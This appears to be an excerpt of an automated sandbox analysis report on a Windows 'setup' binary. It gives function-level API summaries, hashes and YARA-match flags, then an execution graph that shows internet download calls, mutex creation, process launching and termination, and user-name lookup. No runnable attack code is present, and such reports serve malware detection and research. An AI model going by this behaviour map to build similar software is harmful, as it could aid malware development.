                  • Part of subcall function 0204169C: std::exception::_Copy_str.LIBCMT ref: 020416B5
                • __CxxThrowException@8.LIBCMT ref: 0205FC06
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                • String ID: TeM$TeM
                • API String ID: 3662862379-3870166017
                • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                • Instruction ID: 13d32aafc14a465af9f293a761e0745882b8b0f2cc8c52b7598a63b67fde7b1e
                • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                • Instruction Fuzzy Hash: 51D067B5C0030CBBCB00EFA5D459CDDBBB9AB04344B00C466A91897241EA74E3899F94
                APIs
                  • Part of subcall function 0203197D: __wfsopen.LIBCMT ref: 02031988
                • _fgetws.LIBCMT ref: 0201D15C
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __wfsopen_fgetws
                • String ID:
                • API String ID: 853134316-0
                • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                • Instruction ID: 84322b14a64baf69d5c8aa1750cf1c9a946529bb760f2b53408ed2afbd12c2d9
                • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                • Instruction Fuzzy Hash: 46919171D00319ABCF26DFA4CC857EEB7F6BF14314F14052AE819A3240E775AA14DBA5
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _malloc$__except_handler4_fprintf
                • String ID:
                • API String ID: 1783060780-0
                • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                • Instruction ID: 9e83a09e9ad8465dbe3300ff266bce628436b9da9e6c7b60b4081c8506596ea7
                • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                • Instruction Fuzzy Hash: 4FA14EB1C00359EFEF11EFE4C849BEEBB76AF14308F140029D50576291D7B65A48EBA6
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                • String ID:
                • API String ID: 2974526305-0
                • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                • Instruction ID: e0d0f9f7a0d3fd8a51d656d611686f4f114f549775612c5d8366d913646f7267
                • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                • Instruction Fuzzy Hash: 80518F70A103099FDB678E7988806EE77FAAF40328F148729EC35962D0D7719D50EB40
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00414E47
                • __isleadbyte_l.LIBCMT ref: 00414E7A
                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,00000000,?,?), ref: 00414EAB
                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,00000000,?,?), ref: 00414F19
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                • String ID:
                • API String ID: 3058430110-0
                • Opcode ID: c321028ee607638beb9b2895bd493bb576520b7be75ae6a537a551ebcb90963e
                • Instruction ID: 414495a4fc8555345b78eedeead350e879e29d50e2dd4d99a23bb83a56100b44
                • Opcode Fuzzy Hash: c321028ee607638beb9b2895bd493bb576520b7be75ae6a537a551ebcb90963e
                • Instruction Fuzzy Hash: E831D031A00345EFCB21DF64C880DEA7BA5FF81310F1989AAE4659B291D335DDC1DB58
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction ID: 6e52ce6d163c7fc50b7c143514515f0664f3c7364cda9081cceb833a23befd1f
                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction Fuzzy Hash: 8C01363640025ABBCF125E84DC91EEE7FA2BF19358B488415FE5958820D336C9B2BB81
                APIs
                • ___BuildCatchObject.LIBCMT ref: 020D7A4B
                  • Part of subcall function 020D8140: ___BuildCatchObjectHelper.LIBCMT ref: 020D8172
                  • Part of subcall function 020D8140: ___AdjustPointer.LIBCMT ref: 020D8189
                • _UnwindNestedFrames.LIBCMT ref: 020D7A62
                • ___FrameUnwindToState.LIBCMT ref: 020D7A74
                • CallCatchBlock.LIBCMT ref: 020D7A98
                Memory Dump Source
                • Source File: 00000000.00000002.2089132256.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Offset: 02010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2010000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                • String ID:
                • API String ID: 2901542994-0
                • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction ID: b29cfe1547884e71cf72ff7c511f8a95c370700fdfa5d1055a3808514e0902f5
                • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction Fuzzy Hash: 5101D732001309BBCF12AF59DD00EDA7BAAEF88754F158015F91866121D732E961EFA0
                APIs
                • std::_Xinvalid_argument.LIBCPMT ref: 00408298
                  • Part of subcall function 00408771: std::exception::exception.LIBCMT ref: 00408786
                  • Part of subcall function 00408771: __CxxThrowException@8.LIBCMT ref: 0040879B
                  • Part of subcall function 00408771: std::exception::exception.LIBCMT ref: 004087AC
                  • Part of subcall function 00408216: std::_Xinvalid_argument.LIBCPMT ref: 00408229
                • _memmove.LIBCMT ref: 004082F3
                Strings
                • invalid string position, xrefs: 00408293
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                • String ID: invalid string position
                • API String ID: 3404309857-1799206989
                • Opcode ID: 9f332a16aa2539bdcf05ebb50af76097cb82bffd1cd9de518c3fd041d25a16a7
                • Instruction ID: 89c772f9fdfe9c93302187d2a70675543a63902dfa4d158703fde6b72de5b998
                • Opcode Fuzzy Hash: 9f332a16aa2539bdcf05ebb50af76097cb82bffd1cd9de518c3fd041d25a16a7
                • Instruction Fuzzy Hash: F11104313006109BCB249E4D9E40E2AB7A5EB91B14B20097FF892B73C1CF79D801C79D
                APIs
                • std::_Xinvalid_argument.LIBCPMT ref: 0040808B
                  • Part of subcall function 00408771: std::exception::exception.LIBCMT ref: 00408786
                  • Part of subcall function 00408771: __CxxThrowException@8.LIBCMT ref: 0040879B
                  • Part of subcall function 00408771: std::exception::exception.LIBCMT ref: 004087AC
                • _memmove.LIBCMT ref: 004080C4
                Strings
                • invalid string position, xrefs: 00408086
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                • String ID: invalid string position
                • API String ID: 1785806476-1799206989
                • Opcode ID: 8a62ff70c8136bcf9158a2ab6e4df868be6f154fa7a7e9c22e48eceaec0ec74b
                • Instruction ID: b438a7fb66b98a2c793e571057fbb88e6c718bfd8c3db85673638d7bf3199fb7
                • Opcode Fuzzy Hash: 8a62ff70c8136bcf9158a2ab6e4df868be6f154fa7a7e9c22e48eceaec0ec74b
                • Instruction Fuzzy Hash: 0301F5313002008BD3248E68CE80827B3A6EBC1714732493EE5C297385DF7AEC4A87AC
                APIs
                  • Part of subcall function 00409116: __getptd.LIBCMT ref: 0040911C
                  • Part of subcall function 00409116: __getptd.LIBCMT ref: 0040912C
                • __getptd.LIBCMT ref: 0040BD66
                  • Part of subcall function 0040C77B: __getptd_noexit.LIBCMT ref: 0040C77E
                  • Part of subcall function 0040C77B: __amsg_exit.LIBCMT ref: 0040C78B
                • __getptd.LIBCMT ref: 0040BD74
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: __getptd$__amsg_exit__getptd_noexit
                • String ID: csm
                • API String ID: 803148776-1018135373
                • Opcode ID: a09420094ac075c62cd0e7adeedfd7bae899a5ac82c0cf2af40aa39917a17090
                • Instruction ID: d3c89b7d8c5d10138144b8d4382eef4abb43720a50e85da47955f128d595be96
                • Opcode Fuzzy Hash: a09420094ac075c62cd0e7adeedfd7bae899a5ac82c0cf2af40aa39917a17090
                • Instruction Fuzzy Hash: A70128348206078BCF359F21C484AAEB7B5EF10315F18453FE445762D2CB398981DE8D
                APIs
                  • Part of subcall function 004080ED: _memmove.LIBCMT ref: 0040810F
                • __CxxThrowException@8.LIBCMT ref: 00408210
                  • Part of subcall function 00409248: RaiseException.KERNEL32(?,?,00409247,?,?,?,?,?,00409247,?,004185EC,0052833C), ref: 0040928A
                • std::_Xinvalid_argument.LIBCPMT ref: 00408229
                  • Part of subcall function 00408724: std::exception::exception.LIBCMT ref: 00408739
                  • Part of subcall function 00408724: __CxxThrowException@8.LIBCMT ref: 0040874E
                  • Part of subcall function 00408724: std::exception::exception.LIBCMT ref: 0040875F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2087749655.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.2087707377.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087799205.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2087896117.0000000000528000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2088183964.000000000052B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                Similarity
                • API ID: Exception@8Throwstd::exception::exception$ExceptionRaiseXinvalid_argument_memmovestd::_
                • String ID: string too long
                • API String ID: 224251009-2556327735
                • Opcode ID: fd0ffbea2288f3ca92735c054780d65956cdcc12e04167feab602ece8f4daa74
                • Instruction ID: 5ba97528ee0137129c482735d0a878e253dc9b220439154e68826d5de924f9ee
                • Opcode Fuzzy Hash: fd0ffbea2288f3ca92735c054780d65956cdcc12e04167feab602ece8f4daa74
                • Instruction Fuzzy Hash: 98E0E53150143437CA1075A65E01DDF3A49DF41764B21097FF594BB0C2CE39D84181ED

                Execution Graph

                Execution Coverage:2.2%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:35.1%
                Total number of Nodes:812
                Total number of Limit Nodes:14
                execution_graph 44673 423f84 44674 423f90 _fputws 44673->44674 44710 432603 GetStartupInfoW 44674->44710 44677 423f95 44712 4278d5 GetProcessHeap 44677->44712 44678 423fed 44679 423ff8 44678->44679 45042 42411a 58 API calls 3 library calls 44678->45042 44713 425141 44679->44713 44682 423ffe 44683 424009 __RTC_Initialize 44682->44683 45043 42411a 58 API calls 3 library calls 44682->45043 44734 428754 44683->44734 44686 424018 44687 424024 GetCommandLineW 44686->44687 45044 42411a 58 API calls 3 library calls 44686->45044 44753 43235f GetEnvironmentStringsW 44687->44753 44690 424023 44690->44687 44693 42403e 44694 424049 44693->44694 45045 427c2e 58 API calls 3 library calls 44693->45045 44763 4321a1 44694->44763 44698 42405a 44777 427c68 44698->44777 44701 424062 44702 42406d __wwincmdln 44701->44702 45047 427c2e 58 API calls 3 library calls 44701->45047 44783 419f90 44702->44783 44705 424081 44706 424090 44705->44706 45039 427f3d 44705->45039 45048 427c59 58 API calls _doexit 44706->45048 44709 424095 _fputws 44711 432619 44710->44711 44711->44677 44712->44678 45049 427d6c EncodePointer 44713->45049 44715 425146 45054 428c48 44715->45054 44718 42514f 45067 4251b7 61 API calls 2 library calls 44718->45067 44721 425154 44721->44682 44723 42516c 45061 428c96 44723->45061 44726 4251ae 45070 4251b7 61 API calls 2 library calls 44726->45070 44729 4251b3 44729->44682 44730 42518d 44730->44726 44731 425193 44730->44731 45069 42508e 58 API calls 4 library calls 44731->45069 44733 42519b GetCurrentThreadId 44733->44682 44735 428760 _fputws 44734->44735 45084 428af7 44735->45084 44737 428767 44738 428c96 __calloc_crt 58 API calls 44737->44738 44739 428778 44738->44739 44740 4287e3 GetStartupInfoW 44739->44740 44741 428783 _fputws @_EH4_CallFilterFunc@8 44739->44741 44747 4287f8 44740->44747 44750 428927 44740->44750 44741->44686 44742 4289ef 45093 4289ff LeaveCriticalSection _doexit 44742->45093 44744 428c96 __calloc_crt 58 API calls 44744->44747 44745 428974 GetStdHandle 44745->44750 44746 428987 GetFileType 44746->44750 44747->44744 44749 428846 44747->44749 44747->44750 44748 42887a GetFileType 44748->44749 44749->44748 44749->44750 45091 43263e InitializeCriticalSectionAndSpinCount 44749->45091 44750->44742 44750->44745 44750->44746 45092 43263e InitializeCriticalSectionAndSpinCount 44750->45092 44754 432370 44753->44754 44755 424034 44753->44755 45096 428cde 58 API calls 2 library calls 44754->45096 44759 431f64 GetModuleFileNameW 44755->44759 44757 432396 ___check_float_string 44758 4323ac FreeEnvironmentStringsW 44757->44758 44758->44755 44760 431f98 _wparse_cmdline 44759->44760 44762 431fd8 _wparse_cmdline 44760->44762 45097 428cde 58 API calls 2 library calls 44760->45097 44762->44693 44764 4321ba _fputws 44763->44764 44768 42404f 44763->44768 44765 428c96 __calloc_crt 58 API calls 44764->44765 44773 4321e3 _fputws 44765->44773 44766 43223a 45099 420bed 58 API calls 2 library calls 44766->45099 44768->44698 45046 427c2e 58 API calls 3 library calls 44768->45046 44769 428c96 __calloc_crt 58 API calls 44769->44773 44770 43225f 45100 420bed 58 API calls 2 library calls 44770->45100 44773->44766 44773->44768 44773->44769 44773->44770 44774 432276 44773->44774 45098 42962f 58 API calls _fputws 44773->45098 45101 4242fd 8 API calls 2 library calls 44774->45101 44776 432282 44779 427c74 __IsNonwritableInCurrentImage 44777->44779 45102 43aeb5 44779->45102 44780 427c92 __initterm_e 44782 427cb1 _doexit __IsNonwritableInCurrentImage 44780->44782 45105 4219ac 67 API calls __cinit 44780->45105 44782->44701 44784 419fa0 __ftell_nolock 44783->44784 45106 40cf10 44784->45106 44786 419fb0 44787 419fc4 GetCurrentProcess GetLastError SetPriorityClass 44786->44787 44788 419fb4 44786->44788 44789 419fe4 GetLastError 44787->44789 44790 419fe6 44787->44790 45330 4124e0 109 API calls _memset 44788->45330 44789->44790 45120 41d3c0 44790->45120 44793 419fb9 44793->44705 44795 41a022 45123 41d340 44795->45123 44796 41b669 45428 44f23e 59 API calls 2 library calls 44796->45428 44798 41b673 45429 44f23e 59 API calls 2 library calls 44798->45429 44803 41a065 45128 413a90 44803->45128 44807 41a159 GetCommandLineW CommandLineToArgvW lstrcpyW 44808 41a33d GlobalFree 44807->44808 44823 41a196 44807->44823 44809 41a354 44808->44809 44810 41a45c 44808->44810 44812 412220 76 API calls 44809->44812 45184 412220 44810->45184 44811 41a100 44811->44807 44814 41a359 44812->44814 44816 41a466 44814->44816 45199 40ef50 44814->45199 44815 41a1cc lstrcmpW lstrcmpW 44815->44823 44816->44705 44818 41a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 44818->44823 44819 41a48f 44822 41a4ef 44819->44822 45204 413ea0 44819->45204 44821 420235 60 API calls _LanguageEnumProc@4 44821->44823 44825 411cd0 92 API calls 44822->44825 44823->44808 44823->44815 44823->44818 44823->44821 44824 41a361 44823->44824 45144 423c92 44824->45144 44827 41a563 44825->44827 44860 41a5db 44827->44860 45225 414690 44827->45225 44829 41a395 OpenProcess 44831 41a402 44829->44831 44832 41a3a9 WaitForSingleObject CloseHandle 44829->44832 45147 411cd0 44831->45147 44832->44831 44837 41a3cb 44832->44837 44833 41a6f9 45332 411a10 8 API calls 44833->45332 44834 41a5a9 44839 414690 59 API calls 44834->44839 44853 41a3e2 GlobalFree 44837->44853 44854 41a3d4 Sleep 44837->44854 45331 411ab0 PeekMessageW DispatchMessageW PeekMessageW 44837->45331 44838 41a6fe 44841 41a8b6 CreateMutexA 44838->44841 44842 41a70f 44838->44842 44844 41a5d4 44839->44844 44840 41a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 44845 41a451 44840->44845 44847 41a8ca 44841->44847 44846 41a7dc 44842->44846 44858 40ef50 58 API calls 44842->44858 45248 40d240 CoInitialize 44844->45248 44845->44705 44849 40ef50 58 API calls 44846->44849 44852 40ef50 58 API calls 44847->44852 44848 41a624 GetVersion 44848->44833 44850 41a632 lstrcpyW lstrcatW lstrcatW 44848->44850 44855 41a7ec 44849->44855 44856 41a674 _memset 44850->44856 44863 41a8da 44852->44863 44857 41a3f7 44853->44857 44854->44829 44859 41a7f1 lstrlenA 44855->44859 44862 41a6b4 ShellExecuteExW 44856->44862 44857->44705 44865 41a72f 44858->44865 45334 420c62 44859->45334 44860->44833 44860->44838 44860->44841 44860->44848 44862->44838 44884 41a6e3 44862->44884 44866 413ea0 59 API calls 44863->44866 44879 41a92f 44863->44879 44864 41a810 _memset 44868 41a81e MultiByteToWideChar lstrcatW 44864->44868 44867 413ea0 59 API calls 44865->44867 44870 41a780 44865->44870 44866->44863 44867->44865 44868->44859 44869 41a847 lstrlenW 44868->44869 44871 41a8a0 CreateMutexA 44869->44871 44872 41a856 44869->44872 44873 41a792 44870->44873 44874 41a79c CreateThread 44870->44874 44871->44847 45351 40e760 95 API calls 44872->45351 45333 413ff0 59 API calls ___check_float_string 44873->45333 44874->44846 44878 41a7d0 44874->44878 45733 41dbd0 95 API calls 4 library calls 44874->45733 44877 41a860 CreateThread WaitForSingleObject 44877->44871 45734 41e690 203 API calls 8 library calls 44877->45734 44878->44846 45352 415c10 44879->45352 44881 41a98c 45367 412840 60 API calls 44881->45367 44883 41a997 45368 410fc0 93 API calls 4 library calls 44883->45368 44884->44705 44886 41a9ab 44887 41a9c2 lstrlenA 44886->44887 44887->44884 44889 41a9d8 44887->44889 44888 415c10 59 API calls 44890 41aa23 44888->44890 44889->44888 45369 412840 60 API calls 44890->45369 44892 41aa2e lstrcpyA 44895 41aa4b 44892->44895 44894 415c10 59 API calls 44896 41aa90 44894->44896 44895->44894 44897 40ef50 58 API calls 44896->44897 44898 41aaa0 44897->44898 44899 413ea0 59 API calls 44898->44899 44900 41aaf5 44898->44900 44899->44898 45370 413ff0 59 API calls ___check_float_string 44900->45370 44902 41ab1d 45371 412900 44902->45371 44904 40ef50 58 API calls 44906 41abc5 44904->44906 44905 41ab28 _memmove 44905->44904 44907 413ea0 59 API calls 44906->44907 44908 41ac1e 44906->44908 44907->44906 45376 413ff0 59 API calls ___check_float_string 44908->45376 44910 41ac46 44911 412900 60 API calls 44910->44911 44913 41ac51 _memmove 44911->44913 44912 40ef50 58 API calls 44914 41acee 44912->44914 44913->44912 44915 413ea0 59 API calls 44914->44915 44916 41ad43 44914->44916 44915->44914 45377 413ff0 59 API calls ___check_float_string 44916->45377 44918 41ad6b 44919 412900 60 API calls 44918->44919 44922 41ad76 _memmove 44919->44922 44920 415c10 59 API calls 44921 41ae2a 44920->44921 45378 413580 59 API calls 44921->45378 44922->44920 44924 41ae3c 44925 415c10 59 API calls 44924->44925 44926 41ae76 44925->44926 45379 413580 59 API calls 44926->45379 44928 41ae82 44929 415c10 59 API calls 44928->44929 44930 41aebc 44929->44930 45380 413580 59 API calls 44930->45380 44932 41aec8 44933 415c10 59 API calls 44932->44933 44934 41af02 44933->44934 45381 413580 59 API calls 44934->45381 44936 41af0e 44937 415c10 59 API calls 44936->44937 44938 41af48 44937->44938 45382 413580 59 API calls 44938->45382 44940 41af54 44941 415c10 59 API calls 44940->44941 44942 41af8e 44941->44942 45383 413580 59 API calls 44942->45383 44944 41af9a 44945 415c10 59 API calls 44944->44945 44946 41afd4 44945->44946 45384 413580 59 API calls 44946->45384 44948 41afe0 45385 413100 59 API calls 44948->45385 44950 41b001 45386 413580 59 API calls 44950->45386 44952 41b025 45387 413100 59 API calls 44952->45387 44954 41b03c 45388 413580 59 API calls 44954->45388 44956 41b059 45389 413100 59 API calls 44956->45389 44958 41b070 45390 413580 59 API calls 44958->45390 44960 41b07c 45391 413100 59 API calls 44960->45391 44962 41b093 45392 413580 59 API calls 44962->45392 44964 41b09f 45393 413100 59 API calls 44964->45393 44966 41b0b6 45394 413580 59 API calls 44966->45394 44968 41b0c2 45395 413100 59 API calls 44968->45395 44970 41b0d9 45396 413580 59 API calls 44970->45396 44972 41b0e5 45397 413100 59 API calls 44972->45397 44974 41b0fc 45398 413580 59 API calls 44974->45398 44976 41b108 44978 41b130 44976->44978 45399 41cdd0 59 API calls 44976->45399 44979 40ef50 58 API calls 44978->44979 44980 41b16e 44979->44980 44982 41b1a5 GetUserNameW 44980->44982 45400 412de0 59 API calls 44980->45400 44983 41b1c9 44982->44983 45401 412c40 44983->45401 44985 41b1d8 45408 412bf0 59 API calls 44985->45408 44987 41b1ea 45409 40ecb0 60 API calls 2 library calls 44987->45409 44989 41b2f5 45412 4136c0 59 API calls 44989->45412 44991 41b308 45413 40ca70 59 API calls 44991->45413 44993 41b311 45414 4130b0 59 API calls 44993->45414 44995 412c40 59 API calls 45010 41b1f3 44995->45010 44996 41b322 45415 40c740 120 API calls 4 library calls 44996->45415 44998 412900 60 API calls 44998->45010 44999 41b327 45416 4111c0 169 API calls 2 library calls 44999->45416 45002 41b33b 45417 41ba10 LoadCursorW RegisterClassExW 45002->45417 45004 41b343 45418 41ba80 CreateWindowExW ShowWindow UpdateWindow 45004->45418 45005 413100 59 API calls 45005->45010 45007 41b34b 45011 41b34f 45007->45011 45419 410a50 65 API calls 45007->45419 45010->44989 45010->44995 45010->44998 45010->45005 45410 413580 59 API calls 45010->45410 45411 40f1f0 59 API calls 45010->45411 45011->44884 45012 41b379 45420 413100 59 API calls 45012->45420 45014 41b3a5 45421 413580 59 API calls 45014->45421 45016 41b48b 45427 41fdc0 CreateThread 45016->45427 45018 41b49f GetMessageW 45019 41b4ed 45018->45019 45020 41b4bf 45018->45020 45023 41b502 PostThreadMessageW 45019->45023 45024 41b55b 45019->45024 45021 41b4c5 TranslateMessage DispatchMessageW GetMessageW 45020->45021 45021->45019 45021->45021 45025 41b510 PeekMessageW 45023->45025 45026 41b564 PostThreadMessageW 45024->45026 45027 41b5bb 45024->45027 45029 41b546 WaitForSingleObject 45025->45029 45030 41b526 DispatchMessageW PeekMessageW 45025->45030 45028 41b570 PeekMessageW 45026->45028 45027->45011 45033 41b5d2 CloseHandle 45027->45033 45031 41b5a6 WaitForSingleObject 45028->45031 45032 41b586 DispatchMessageW PeekMessageW 45028->45032 45029->45024 45029->45025 45030->45029 45030->45030 45031->45027 45031->45028 45032->45031 45032->45032 45033->45011 45038 41b3b3 45038->45016 45422 41c330 59 API calls 45038->45422 45423 41c240 59 API calls 45038->45423 45424 41b8b0 59 API calls 45038->45424 45425 413260 59 API calls 45038->45425 45426 41fa10 CreateThread 45038->45426 45735 427e0e 45039->45735 45041 427f4c 45041->44706 45042->44679 45043->44683 45044->44690 45048->44709 45050 427d7d __init_pointers __initp_misc_winsig 45049->45050 45071 423540 EncodePointer 45050->45071 45052 427d95 __init_pointers 45053 4326ac 34 API calls 45052->45053 45053->44715 45055 428c54 45054->45055 45057 42514b 45055->45057 45072 43263e InitializeCriticalSectionAndSpinCount 45055->45072 45057->44718 45058 4324f7 45057->45058 45059 425161 45058->45059 45060 43250e TlsAlloc 45058->45060 45059->44718 45059->44723 45062 428c9d 45061->45062 45064 425179 45062->45064 45066 428cbb 45062->45066 45073 43b813 45062->45073 45064->44726 45068 432553 TlsSetValue 45064->45068 45066->45062 45066->45064 45081 4329c9 Sleep 45066->45081 45067->44721 45068->44730 45069->44733 45070->44729 45071->45052 45072->45055 45074 43b81e 45073->45074 45079 43b839 45073->45079 45075 43b82a 45074->45075 45074->45079 45082 425208 58 API calls __getptd_noexit 45075->45082 45077 43b849 RtlAllocateHeap 45077->45079 45080 43b82f 45077->45080 45079->45077 45079->45080 45083 42793d DecodePointer 45079->45083 45080->45062 45081->45066 45082->45080 45083->45079 45085 428b1b EnterCriticalSection 45084->45085 45086 428b08 45084->45086 45085->44737 45094 428b9f 58 API calls 9 library calls 45086->45094 45088 428b0e 45088->45085 45095 427c2e 58 API calls 3 library calls 45088->45095 45091->44749 45092->44750 45093->44741 45094->45088 45096->44757 45097->44762 45098->44773 45099->44768 45100->44768 45101->44776 45103 43aeb8 EncodePointer 45102->45103 45103->45103 45104 43aed2 45103->45104 45104->44780 45105->44782 45107 40cf32 _memset __ftell_nolock 45106->45107 45108 40cf4f InternetOpenW 45107->45108 45109 415c10 59 API calls 45108->45109 45110 40cf8a InternetOpenUrlW 45109->45110 45111 40cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 45110->45111 45117 40cfb2 45110->45117 45430 4156d0 45111->45430 45113 4156d0 59 API calls 45115 40d049 45113->45115 45114 40d000 45114->45113 45115->45117 45449 413010 59 API calls 45115->45449 45117->44786 45118 40d084 45118->45117 45450 413010 59 API calls 45118->45450 45455 41ccc0 45120->45455 45475 41cc50 45123->45475 45126 41a04d 45126->44798 45126->44803 45129 413ab2 45128->45129 45137 413ad0 GetModuleFileNameW PathRemoveFileSpecW 45128->45137 45130 413b00 45129->45130 45131 413aba 45129->45131 45483 44f23e 59 API calls 2 library calls 45130->45483 45132 423b4c 59 API calls 45131->45132 45134 413ac7 45132->45134 45134->45137 45484 44f1bb 59 API calls 3 library calls 45134->45484 45138 418400 45137->45138 45139 418437 45138->45139 45143 418446 45138->45143 45139->45143 45485 415d50 59 API calls 